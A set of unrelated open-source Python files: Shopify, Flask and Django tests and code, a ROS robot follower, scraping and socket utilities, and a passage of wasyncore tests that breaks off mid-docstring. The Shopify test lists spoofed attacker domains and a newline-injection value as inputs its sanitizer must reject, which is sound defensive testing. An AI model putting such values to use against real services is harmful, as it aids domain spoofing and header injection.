def test_returns_none_for_bad_shop_domains(self):
bad_shop_domains = [
"myshop.com",
"myshopify.com",
"shopify.com",
"two words",
"store.myshopify.com.evil.com",
"/foo/bar",
"/foo.myshopify.io.evil.ru",
"%0a123.myshopify.io ",
"foo.bar.myshopify.io",
]
sanitized_shops = [shop_url.sanitize_shop_domain(shop_domain) for shop_domain in bad_shop_domains]
self.assertTrue(all(shop_domain is None for shop_domain in sanitized_shops))
def test_returns_hostname_for_custom_shop_domains(self):
custom_shop_domains = [
"my-shop",
"my-shop.myshopify.io",
"http://my-shop.myshopify.io",
"https://my-shop.myshopify.io",
]
sanitized_shops = [
shop_url.sanitize_shop_domain(shop_domain, "myshopify.io") for shop_domain in custom_shop_domains
]
self.assertTrue(all(shop == "my-shop.myshopify.io" for shop in sanitized_shops))
def test_returns_none_for_none_type(self):
self.assertIsNone(shop_url.sanitize_shop_domain(None))
|
Shopify/shopify_python_api
|
test/utils/shop_url_test.py
|
Python
|
mit
| 1,736
|
from tovendendo.users.forms import LoginForm, RegistrationForm
from werkzeug.datastructures import MultiDict
import pytest
def test_allows_login_with_valid_data(user):
data = MultiDict({'email': 'user@email.com', 'password': 'pas'})
form = LoginForm(data)
assert form.validate()
@pytest.mark.parametrize('email,password', [
('', ''),
(None, None)
])
def test_login_when_form_is_invalid(email, password):
form = LoginForm(email=email, password=password)
assert not form.validate()
def test_allows_registration_with_valid_data(session):
data = MultiDict({
'name': 'Harry Poter',
'email': 'harry@poter.com',
'password': '4321',
'phone_number': '43112345'})
form = RegistrationForm(data)
assert form.validate()
@pytest.mark.parametrize('name,email,password,phone_number', [
('', '', '', ''),
(None, None, None, None)
])
def test_registration_when_form_is_invalid(name, email, password, phone_number, session):
data = MultiDict({
'name': 'Myname',
'email': email,
'password': password,
'phone_number': '0987654'})
form = RegistrationForm(data)
assert not form.validate()
def test_denied_registration_with_already_registered_email(user, session):
data = MultiDict({
'name': 'Harry Poter',
'email': user.email,
'password': '4321',
'phone_number': user.phone_number})
form = RegistrationForm(data)
assert not form.validate()
def test_denied_registration_with_already_registered_phone_number(user, session):
data = MultiDict({
'name': 'Harry Poter',
'email': 'user@email.com',
'password': '4321',
'phone_number': user.phone_number})
form = RegistrationForm(data)
assert not form.validate()
|
anapaulagomes/to-vendendo
|
tests/users/test_form.py
|
Python
|
mit
| 2,003
|
#!/usr/bin/env python
"""
ar_follower.py - Version 1.0 2013-08-25
Follow an AR tag published on the /ar_pose_marker topic. The /ar_pose_marker topic
is published by the ar_track_alvar package
Created for the Pi Robot Project: http://www.pirobot.org
Copyright (c) 2013 Patrick Goebel. All rights reserved.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details at:
http://www.gnu.org/licenses/gpl.html
"""
import rospy
from ar_track_alvar.msg import AlvarMarkers
from geometry_msgs.msg import Twist
from math import copysign
class ARFollower():
def __init__(self):
rospy.init_node("ar_follower")
# Set the shutdown function (stop the robot)
rospy.on_shutdown(self.shutdown)
# How often should we update the robot's motion?
self.rate = rospy.get_param("~rate", 10)
r = rospy.Rate(self.rate)
# The maximum rotation speed in radians per second
self.max_angular_speed = rospy.get_param("~max_angular_speed", 2.0)
# The minimum rotation speed in radians per second
self.min_angular_speed = rospy.get_param("~min_angular_speed", 0.5)
# The maximum distance a target can be from the robot for us to track
self.max_x = rospy.get_param("~max_x", 20.0)
# The goal distance (in meters) to keep between the robot and the marker
self.goal_x = rospy.get_param("~goal_x", 0.6)
# How far away from the goal distance (in meters) before the robot reacts
self.x_threshold = rospy.get_param("~x_threshold", 0.05)
# How far away from being centered (y displacement) on the AR marker
# before the robot reacts (units are meters)
self.y_threshold = rospy.get_param("~y_threshold", 0.05)
# How much do we weight the goal distance (x) when making a movement
self.x_scale = rospy.get_param("~x_scale", 0.5)
# How much do we weight y-displacement when making a movement
self.y_scale = rospy.get_param("~y_scale", 1.0)
# The max linear speed in meters per second
self.max_linear_speed = rospy.get_param("~max_linear_speed", 0.3)
# The minimum linear speed in meters per second
self.min_linear_speed = rospy.get_param("~min_linear_speed", 0.1)
# Publisher to control the robot's movement
self.cmd_vel_pub = rospy.Publisher('cmd_vel', Twist)
# Intialize the movement command
self.move_cmd = Twist()
# Set flag to indicate when the AR marker is visible
self.target_visible = False
# Wait for the ar_pose_marker topic to become available
rospy.loginfo("Waiting for ar_pose_marker topic...")
rospy.wait_for_message('ar_pose_marker', AlvarMarkers)
# Subscribe to the ar_pose_marker topic to get the image width and height
rospy.Subscriber('ar_pose_marker', AlvarMarkers, self.set_cmd_vel)
rospy.loginfo("Marker messages detected. Starting follower...")
# Begin the cmd_vel publishing loop
while not rospy.is_shutdown():
# Send the Twist command to the robot
self.cmd_vel_pub.publish(self.move_cmd)
# Sleep for 1/self.rate seconds
r.sleep()
def set_cmd_vel(self, msg):
# Pick off the first marker (in case there is more than one)
try:
marker = msg.markers[0]
if not self.target_visible:
rospy.loginfo("FOLLOWER is Tracking Target!")
self.target_visible = True
except:
# If target is loar, stop the robot by slowing it incrementally
self.move_cmd.linear.x /= 1.5
self.move_cmd.angular.z /= 1.5
if self.target_visible:
rospy.loginfo("FOLLOWER LOST Target!")
self.target_visible = False
return
# Get the displacement of the marker relative to the base
target_offset_y = marker.pose.pose.position.y
# Get the distance of the marker from the base
target_offset_x = marker.pose.pose.position.x
# Rotate the robot only if the displacement of the target exceeds the threshold
if abs(target_offset_y) > self.y_threshold:
# Set the rotation speed proportional to the displacement of the target
speed = target_offset_y * self.y_scale
self.move_cmd.angular.z = copysign(max(self.min_angular_speed,
min(self.max_angular_speed, abs(speed))), speed)
else:
self.move_cmd.angular.z = 0.0
# Now get the linear speed
if abs(target_offset_x - self.goal_x) > self.x_threshold:
speed = (target_offset_x - self.goal_x) * self.x_scale
if speed < 0:
speed *= 1.5
self.move_cmd.linear.x = copysign(min(self.max_linear_speed, max(self.min_linear_speed, abs(speed))), speed)
else:
self.move_cmd.linear.x = 0.0
def shutdown(self):
rospy.loginfo("Stopping the robot...")
self.cmd_vel_pub.publish(Twist())
rospy.sleep(1)
if __name__ == '__main__':
try:
ARFollower()
rospy.spin()
except rospy.ROSInterruptException:
rospy.loginfo("AR follower node terminated.")
|
fujy/ROS-Project
|
src/rbx2/rbx2_ar_tags/nodes/ar_follower.py
|
Python
|
mit
| 5,999
|
from Bio.Phylo.Applications import PhymlCommandline
import sys
from OrthoEvol.Tools.logit import LogIt
class PhyML(object):
"""The PhyML class uses Biopython's PhyMLCommandline wrapper to generate trees
from the PhyML executable."""
def __init__(self, phyml_input, datatype='aa'):
"""Run phyml to generate tree results.
If you're using Linux, ensure that your phyml path is set in your bash
profile. If you're using Windows, this function will look for the name
of the executable 'PhyML-3.1_win32.exe'.
"""
self.phyml_log = LogIt().default(logname="GenBank", logfile=None)
# Use the phyml executable file
phyml_exe = None
# This is mainly intended for windows use or use with an executable
# file
win32 = "win32"
executable = "PhyML-3.1_win32.exe"
exe_name = executable if sys.platform == win32 else "phyml"
phyml_exe = exe_name
self.phyml_exe = phyml_exe
self.datatype = datatype
self.phyml_input = phyml_input
self._runphyml()
def _runphyml(self):
""""Run phyml.
Input a phylip formatted alignment file and describe the datatype
('nt' or 'aa').
"""
run_phyml = PhymlCommandline(self.phyml_exe,
input=self.phyml_input,
datatype=self.datatype)
out_log, err_log = run_phyml()
self.phyml_log(out_log)
self.phyml_log(err_log)
|
datasnakes/Datasnakes-Scripts
|
OrthoEvol/Orthologs/Phylogenetics/PhyML/orthophyml.py
|
Python
|
mit
| 1,577
|
# -*- coding: utf-8 -*-
"""
Defines views.
"""
import calendar
from flask import redirect, render_template, url_for, make_response, abort
from jinja2 import TemplateNotFound
from presence_analyzer.main import app
from presence_analyzer.utils import (jsonify, get_data, mean,
group_by_weekday,
group_by_weekday_start_end)
import logging
log = logging.getLogger(__name__) # pylint: disable-msg=C0103
@app.route('/')
@app.route('/<name>')
def mainpage(name=None):
"""
Redirects to default front page if name equals None or return render
template from templates directory.
"""
if not name:
return redirect(url_for('mainpage', name='presence_weekday.html'))
try:
return render_template(name)
except TemplateNotFound:
return make_response('Not Found', 404)
@app.route('/api/v1/users', methods=['GET'])
@jsonify
def users_view():
"""
Users listing for dropdown.
"""
data = get_data()
return [{'user_id': i, 'name': 'User {0}'.format(str(i))}
for i in data.keys()]
@app.route('/api/v1/mean_time_weekday/', methods=['GET'])
@app.route('/api/v1/mean_time_weekday/<int:user_id>', methods=['GET'])
@jsonify
def mean_time_weekday_view(user_id=None):
"""
Returns mean presence time of given user grouped by weekday.
"""
data = get_data()
if not user_id:
raise abort(400)
if user_id not in data:
log.debug('User %s not found!', user_id)
return []
weekdays = group_by_weekday(data[user_id])
result = [(calendar.day_abbr[weekday], mean(intervals))
for weekday, intervals in weekdays.items()]
return result
@app.route('/api/v1/presence_weekday/', methods=['GET'])
@app.route('/api/v1/presence_weekday/<int:user_id>', methods=['GET'])
@jsonify
def presence_weekday_view(user_id=None):
"""
Returns total presence time of given user grouped by weekday.
"""
data = get_data()
if not user_id:
raise abort(400)
if user_id not in data:
log.debug('User %s not found!', user_id)
return []
weekdays = group_by_weekday(data[user_id])
result = [(calendar.day_abbr[weekday], sum(intervals))
for weekday, intervals in weekdays.items()]
result.insert(0, ('Weekday', 'Presence (s)'))
return result
@app.route('/api/v1/presence_start_end/', methods=['GET'])
@app.route('/api/v1/presence_start_end/<int:user_id>', methods=['GET'])
@jsonify
def presence_start_end_view(user_id=None):
"""
Returns mean presence time of given user grouped by weekday.
"""
data = get_data()
if not user_id:
raise abort(400)
if user_id not in data:
log.debug('User %s not found!', user_id)
return []
weekdays = group_by_weekday_start_end(data[user_id])
result = [(calendar.day_abbr[weekday], value[0], value[1])
for weekday, value in weekdays.items()]
return result
|
aadamski/presence-analyzer-aadamski
|
src/presence_analyzer/views.py
|
Python
|
mit
| 3,013
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-05-05 20:31
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='CategoryStatusCount',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('category', models.TextField(blank=True, null=True)),
('canceled', models.IntegerField(blank=True, null=True)),
('failed', models.IntegerField(blank=True, null=True)),
('live', models.IntegerField(blank=True, null=True)),
('successful', models.IntegerField(blank=True, null=True)),
('suspended', models.IntegerField(blank=True, null=True)),
('total', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'category_status_count',
'managed': False,
},
),
migrations.CreateModel(
name='CategoryStatusPercent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('category', models.TextField(blank=True, null=True)),
('canceled', models.IntegerField(blank=True, null=True)),
('failed', models.IntegerField(blank=True, null=True)),
('live', models.IntegerField(blank=True, null=True)),
('successful', models.IntegerField(blank=True, null=True)),
('suspended', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'category_status_percent',
'managed': False,
},
),
migrations.CreateModel(
name='CountryStatusCount',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('country', models.TextField(blank=True, null=True)),
('canceled', models.IntegerField(blank=True, null=True)),
('failed', models.IntegerField(blank=True, null=True)),
('live', models.IntegerField(blank=True, null=True)),
('successful', models.IntegerField(blank=True, null=True)),
('suspended', models.IntegerField(blank=True, null=True)),
('total', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'country_status_count',
'managed': False,
},
),
migrations.CreateModel(
name='CountryStatusPercent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('country', models.TextField(blank=True, null=True)),
('canceled', models.IntegerField(blank=True, null=True)),
('failed', models.IntegerField(blank=True, null=True)),
('live', models.IntegerField(blank=True, null=True)),
('successful', models.IntegerField(blank=True, null=True)),
('suspended', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'country_status_percent',
'managed': False,
},
),
migrations.CreateModel(
name='Kickstarter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.TextField(blank=True, null=True)),
('disable_communication', models.TextField(blank=True, null=True)),
('location_type', models.TextField(blank=True, null=True)),
('category_parent_id', models.IntegerField(blank=True, null=True)),
('sub_category', models.TextField(blank=True, null=True)),
('usd_pledged', models.TextField(blank=True, null=True)),
('launched_at', models.TextField(blank=True, null=True)),
('category_slug', models.TextField(blank=True, null=True)),
('currency', models.TextField(blank=True, null=True)),
('deadline', models.TextField(blank=True, null=True)),
('spotlight', models.TextField(blank=True, null=True)),
('currency_trailing_code', models.TextField(blank=True, null=True)),
('displayable_name', models.TextField(blank=True, null=True)),
('state_changed_at', models.TextField(blank=True, null=True)),
('goal', models.TextField(blank=True, null=True)),
('category', models.TextField(blank=True, null=True)),
('city', models.TextField(blank=True, null=True)),
('name', models.TextField(blank=True, null=True)),
('creator_name', models.TextField(blank=True, null=True)),
('staff_pick', models.TextField(blank=True, null=True)),
('country', models.TextField(blank=True, null=True)),
('pledged', models.TextField(blank=True, null=True)),
('creator', models.TextField(blank=True, null=True)),
('location_code', models.TextField(blank=True, null=True)),
('slug', models.TextField(blank=True, null=True)),
('state', models.TextField(blank=True, null=True)),
('static_usd_rate', models.TextField(blank=True, null=True)),
('location', models.TextField(blank=True, null=True)),
('backers_count', models.TextField(blank=True, null=True)),
('currency_symbol', models.TextField(blank=True, null=True)),
('category_id', models.IntegerField(blank=True, null=True)),
('created_at', models.TextField(blank=True, null=True)),
('blurb', models.TextField(blank=True, null=True)),
('category_position', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'ks_project',
'managed': False,
},
),
migrations.CreateModel(
name='MonthStatusCount',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('month', models.TextField(blank=True, null=True)),
('canceled', models.IntegerField(blank=True, null=True)),
('failed', models.IntegerField(blank=True, null=True)),
('live', models.IntegerField(blank=True, null=True)),
('successful', models.IntegerField(blank=True, null=True)),
('suspended', models.IntegerField(blank=True, null=True)),
('total', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'monthly_status_count',
'managed': False,
},
),
migrations.CreateModel(
name='MonthStatusPercent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('month', models.TextField(blank=True, null=True)),
('canceled', models.IntegerField(blank=True, null=True)),
('failed', models.IntegerField(blank=True, null=True)),
('live', models.IntegerField(blank=True, null=True)),
('successful', models.IntegerField(blank=True, null=True)),
('suspended', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'monthly_status_percent',
'managed': False,
},
),
migrations.CreateModel(
name='Projects',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(blank=True, null=True)),
('creator_name', models.TextField(blank=True, null=True)),
('blurb', models.TextField(blank=True, null=True)),
('backers_count', models.TextField(blank=True, null=True)),
('goal', models.TextField(blank=True, null=True)),
('pledged', models.TextField(blank=True, null=True)),
('percent_of_goal', models.TextField(blank=True, null=True)),
('status', models.TextField(blank=True, null=True)),
('category', models.TextField(blank=True, null=True)),
('sub_category', models.TextField(blank=True, null=True)),
('launched_at', models.DateTimeField(blank=True, null=True)),
('deadline', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, null=True)),
('location', models.TextField(blank=True, null=True)),
('country', models.TextField(blank=True, null=True)),
('state', models.TextField(blank=True, null=True)),
('city', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'projects',
'managed': False,
},
),
migrations.CreateModel(
name='SubCategoryStatusCount',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sub_category', models.TextField(blank=True, null=True)),
('canceled', models.IntegerField(blank=True, null=True)),
('failed', models.IntegerField(blank=True, null=True)),
('live', models.IntegerField(blank=True, null=True)),
('successful', models.IntegerField(blank=True, null=True)),
('suspended', models.IntegerField(blank=True, null=True)),
('total', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'sub_category_status_count',
'managed': False,
},
),
migrations.CreateModel(
name='SubCategoryStatusPercent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sub_category', models.TextField(blank=True, null=True)),
('canceled', models.IntegerField(blank=True, null=True)),
('failed', models.IntegerField(blank=True, null=True)),
('live', models.IntegerField(blank=True, null=True)),
('successful', models.IntegerField(blank=True, null=True)),
('suspended', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'sub_category_status_percent',
'managed': False,
},
),
]
|
pratyaymodi/kickstarter
|
kickstarter_django/kickstarter/migrations/0001_initial.py
|
Python
|
mit
| 11,349
|
import _plotly_utils.basevalidators
class CustomdataValidator(_plotly_utils.basevalidators.DataArrayValidator):
def __init__(
self, plotly_name="customdata", parent_name="choroplethmapbox", **kwargs
):
super(CustomdataValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
role=kwargs.pop("role", "data"),
**kwargs
)
|
plotly/python-api
|
packages/python/plotly/plotly/validators/choroplethmapbox/_customdata.py
|
Python
|
mit
| 476
|
import pytest
from utils.page_model import TestResultPage
from utils.config import config
from tests.common import generate_test_url
UNALLOWED_PORT = config['server_port'] + 1
SAME_ORIGIN = 'http://' + config['server_address'] + ':' + str(config['server_port'])
DIFFERENT_ORIGIN = 'http://' + config['server_address'] + str(UNALLOWED_PORT)
def test_iframe_ancestors_origin_allowed(browser):
"""
Test iframe is loaded if CSP dirctive frame-ancestors allows to load
on the origin which is trying to load it
e.g. if base page is http://127.0.0.1:8000 and it loads iFrame
which has CSP directive frame-ancestors http://127.0.0.1:8000
"""
policy = "frame-ancestors {0}".format(SAME_ORIGIN)
params = "iframe=true"
url = generate_test_url(policy, header=True, meta=False, allow=True,
fixture_url='frame-ancestors', params=params)
page = TestResultPage(browser).open(url)
res = page.get_test_results()
assert (res == 'Pass')
def test_iframe_ancestors_origin_unallowed(browser):
"""
Test iframe is blocked if CSP dirctive frame-ancestors does not allow
to load on the origin which is trying to load it
e.g. if base page is http://127.0.0.1:8000 and it loads iFrame
which has CSP directive frame-ancestors http://127.0.0.1:8001
then since frame-ancestor directive has different origin (port)
iFrame shoudln't be allowed load
"""
policy = "frame-ancestors {0}".format(DIFFERENT_ORIGIN)
params = "iframe=true"
url = generate_test_url(policy, header=True, meta=False, allow=False,
fixture_url='frame-ancestors', params=params)
page = TestResultPage(browser).open(url)
res = page.get_test_results()
assert (res == 'Pass')
|
ilyanesterov/browser-csp-compatibility
|
tests/frame-ancestors/test_frame_ancestors_iframe.py
|
Python
|
mit
| 1,775
|
class Stackoverflow:
def __init__(self):
self.post_texts = []
self.post_ratings = []
# use this method to grab all the information from the page and return
# a tuple (Question, Answers[], Ratings[])
def analyze_page(self, page, search):
try:
post_tags = page.soup.find_all('div', class_="post-text")
vote_tags = page.soup.find_all('span', class_="vote-count-post ")
for tag in post_tags:
self.post_texts.append(tag.text)
for tag in vote_tags:
self.post_ratings.append(int(tag.text))
except:
print("ERROR in Stackoverflow")
return (self.post_texts[0], self.post_texts[1:], self.post_ratings[1:])
|
Draps-/Nani
|
nani/interfaces/stackoverflow_interface.py
|
Python
|
mit
| 750
|
import socket
import time
import numpy as np
import struct
from pathlib import Path
try:
import h5py
except ImportError:
h5py = None
from . import NPKT
def udpunicast(
host: str,
port: int,
h5fn: Path = None,
Nupdate: int = 1000,
bufsize: int = 8192,
Nelbyte: int = 4,
N: int = NPKT,
timeout: float = 5.0,
):
"""
maxshape parameters:
limit ~ 100000*BUFSIZE to overfill hardrive with extremely fast demo
normally you would take other more sensible measures, and have sane datarates.
None means unlimited size (entire hard drive)
"""
# Do NOT connect or bind
with socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) as S:
S.settimeout(timeout)
first = True
if h5py is not None and h5fn:
h5 = h5py.File(h5fn, "w")
h5d = h5.create_dataset(
"/data",
dtype=np.float32,
chunks=True,
shape=(Nupdate * bufsize / Nelbyte,),
maxshape=(100000 * bufsize / Nelbyte,),
)
else:
h5 = h5d = None
# %% main loop
for i in range(N):
tic = time.time()
# %% host-> device
# host (other program) is programmed to send payload for any input--including simply '\n'
S.sendto(b"\n", (host, port, 0, 0))
# %% device -> host
print("recieving")
Nel = struct.unpack("<1L", S.recv(4))[0] # int len
print(Nel)
Nbyte_dg = Nel * Nelbyte
A = S.recv(Nbyte_dg)
if len(A) != Nbyte_dg:
print("unicast_rx: could not determine length")
continue
print(len(A))
# %% parse result
dat = struct.unpack(f"<{Nel:d}f", A)
if first: # to avoid having to restart C code each time
first = False
last = dat[0] - 1
rtoc = time.time() - tic
rtoc = np.mean((time.time() - tic, rtoc))
# %% optional write to disk
if h5 is not None:
h5d[i * Nel : (i + 1) * Nel] = dat
# %% progress report / writing
if not i % Nupdate:
print(rtoc, i)
h5 = _updatemsg(i, h5, h5d, Nupdate, bufsize, Nelbyte)
# %% data validation due to a priori pattern
# for single precision float, large integer jumps are experienced at large values by IEEE754 definition
# assert_allclose(diff(dat),1,err_msg=str(dat))
assert np.allclose(
last, dat[0] - 1
), f"{last} be mindful of min/max values of your datatype"
last = dat[-1]
if h5 is not None:
h5.close()
def _updatemsg(i: int, h5, h5d, Nupdate: int, bufsize: int, Nelbyte: int):
if h5 is not None:
h5.flush() # NOTE: every N loops to improve performance
try:
h5d.resize((i + Nupdate) * bufsize / Nelbyte, axis=0)
except ValueError as e:
print(
"stopping HDF5 writing for this fast demo. in real life you can set maxshape=(None,) for no limit.",
e,
)
h5.close()
h5 = None
return h5
|
scivision/python_c_sockets
|
python_c_sockets/hdf.py
|
Python
|
mit
| 3,302
|
from __future__ import absolute_import
import time
import itertools
from celery import shared_task
import irsignal
@shared_task
def press_remote_buttons(devices_and_buttons_and_timeouts):
for device, button, timeout_in_s in grouper(
devices_and_buttons_and_timeouts, 3, 0):
irsignal.press_button(device, button)
time.sleep(timeout_in_s)
def grouper(iterable, n, fillvalue=None):
"""Collect data into fixed-length chunks or blocks (from the itertools
recipes).
grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
"""
args = [iter(iterable)] * n
return itertools.izip_longest(fillvalue=fillvalue, *args)
@shared_task
def test():
print "the test task is running"
|
luke-moore/house
|
django/house/tasks.py
|
Python
|
mit
| 717
|
# -*- coding: utf-8 -*-
# Scrapy settings for browser_simulator project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'browser_simulator'
SPIDER_MODULES = ['browser_simulator.spiders']
NEWSPIDER_MODULE = 'browser_simulator.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
# USER_AGENT = 'browser_simulator (+http://www.yourdomain.com)'
FEED_URI = '/Users/yuyanghe/Downloads/cs6262.csv'
FEED_FORMAT = 'CSV'
# Obey robots.txt rules
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
# CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
# DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
# CONCURRENT_REQUESTS_PER_DOMAIN = 16
# CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
# COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
# TELNETCONSOLE_ENABLED = False
# Override the default request headers:
# DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
# }
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
# SPIDER_MIDDLEWARES = {
# 'browser_simulator.middlewares.BrowserSimulatorSpiderMiddleware': 543,
# }
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# DOWNLOADER_MIDDLEWARES = {
# 'browser_simulator.middlewares.MyCustomDownloaderMiddleware': 543,
# }
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
# EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
# }
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
# ITEM_PIPELINES = {
# 'browser_simulator.pipelines.BrowserSimulatorPipeline': 300,
# }
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
# AUTOTHROTTLE_ENABLED = True
# The initial download delay
# AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
# AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
# AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
# AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
# HTTPCACHE_ENABLED = True
# HTTPCACHE_EXPIRATION_SECS = 0
# HTTPCACHE_DIR = 'httpcache'
# HTTPCACHE_IGNORE_HTTP_CODES = []
# HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
|
skihyy/GT-Spring-2017-CS6262
|
browser_simulator/browser_simulator/settings.py
|
Python
|
mit
| 3,334
|
from datetime import datetime
from argparse import ArgumentParser
import os
import sys
"""
Script to resume/open recently used files in a directory
"""
def get_recent_files(folder, file_filter, limit):
files = [os.path.join(folder, f) for f in os.listdir(folder)]
if file_filter:
files = list(filter(lambda f: f.endswith(file_filter), files))
recent = [(f, datetime.fromtimestamp(int(os.stat(f).st_ctime))) for f in files]
recent.sort(key=lambda a: a[-1], reverse=True)
return recent[:limit]
def get_parser():
parser = ArgumentParser(description="watch.py")
parser.add_argument('-l', '--limit', default=3, help='get #limit recent files')
parser.add_argument('-a', '--app', default=None, help='full path to specific app')
parser.add_argument('-d', '--dir', default=os.getcwd(), help='full path to directory')
parser.add_argument('-f', '--filter', default=None, help='filter file type e.g. mp4')
return parser
def io(options):
options.dir = os.path.expanduser(options.dir)
files = get_recent_files(options.dir, options.filter, options.limit)
for file, date in files:
ui = None
io_options = ['y', 'n', 'exit']
while (not ui or ui not in io_options):
ui = raw_input("Open {}? {}: ".format(file.rsplit('/')[-1], '/'.join(io_options)))
if (ui == 'exit'): sys.exit()
if (ui == 'y'):
cmd = 'open \'{}\''.format(file)
cmd = cmd if not options.app else '{} -a {}'.format(cmd, options.app)
os.system(cmd)
sys.exit()
if __name__ == '__main__':
parser = get_parser()
options = parser.parse_args()
io(options)
|
harshays/scripts
|
resume/resume.py
|
Python
|
mit
| 1,687
|
import base64
import os
from django.db import models
from django.conf import settings
from twython import Twython
class TwitterProfile(models.Model):
def __unicode__(self):
return self.username
def save(self, *args, **kwargs):
if not self.pk:
twitter = Twython(
settings.TWITTER_APP_KEY,
settings.TWITTER_APP_SECRET,
self.OAUTH_TOKEN,
self.OAUTH_TOKEN_SECRET
)
response = twitter.verify_credentials()
self.username = response['screen_name']
from django.contrib.auth import get_user_model
User = get_user_model()
# check if re-authenticating pre-existing Twitter user
_existing_user = User.objects.filter(username=self.username)
if _existing_user:
user = _existing_user[0]
profile = user.twitterprofile
profile.OAUTH_TOKEN = self.OAUTH_TOKEN
profile.OAUTH_TOKEN_SECRET = self.OAUTH_TOKEN_SECRET
profile.save()
return
if settings.__dict__['_wrapped'].__dict__.get(
'TWITTER_AUTH_RANDOM_PASSWORD', True
):
password = base64.b64encode(os.urandom(16))
else:
password = ""
user = User.objects.create_user(
username=self.username,
password=password
)
self.user = user
super(TwitterProfile, self).save(*args, **kwargs)
OAUTH_TOKEN = models.CharField(max_length=199, blank=True, null=True)
OAUTH_TOKEN_SECRET = models.CharField(max_length=199, blank=True, null=True)
username = models.CharField(max_length=500, blank=True, null=True)
user = models.OneToOneField(settings.AUTH_USER_MODEL)
|
dylanbfox/simple-django-twitter-auth
|
django_twitter_auth/models.py
|
Python
|
mit
| 1,507
|
from waitress import wasyncore as asyncore
from waitress import compat
import contextlib
import functools
import gc
import unittest
import select
import os
import socket
import sys
import time
import errno
import re
import struct
import threading
import warnings
from io import BytesIO
TIMEOUT = 3
HAS_UNIX_SOCKETS = hasattr(socket, 'AF_UNIX')
HOST = 'localhost'
HOSTv4 = "127.0.0.1"
HOSTv6 = "::1"
# Filename used for testing
if os.name == 'java': # pragma: no cover
# Jython disallows @ in module names
TESTFN = '$test'
else:
TESTFN = '@test'
TESTFN = "{}_{}_tmp".format(TESTFN, os.getpid())
class DummyLogger(object): # pragma: no cover
def __init__(self):
self.messages = []
def log(self, severity, message):
self.messages.append((severity, message))
class WarningsRecorder(object): # pragma: no cover
"""Convenience wrapper for the warnings list returned on
entry to the warnings.catch_warnings() context manager.
"""
def __init__(self, warnings_list):
self._warnings = warnings_list
self._last = 0
@property
def warnings(self):
return self._warnings[self._last:]
def reset(self):
self._last = len(self._warnings)
def _filterwarnings(filters, quiet=False): # pragma: no cover
"""Catch the warnings, then check if all the expected
warnings have been raised and re-raise unexpected warnings.
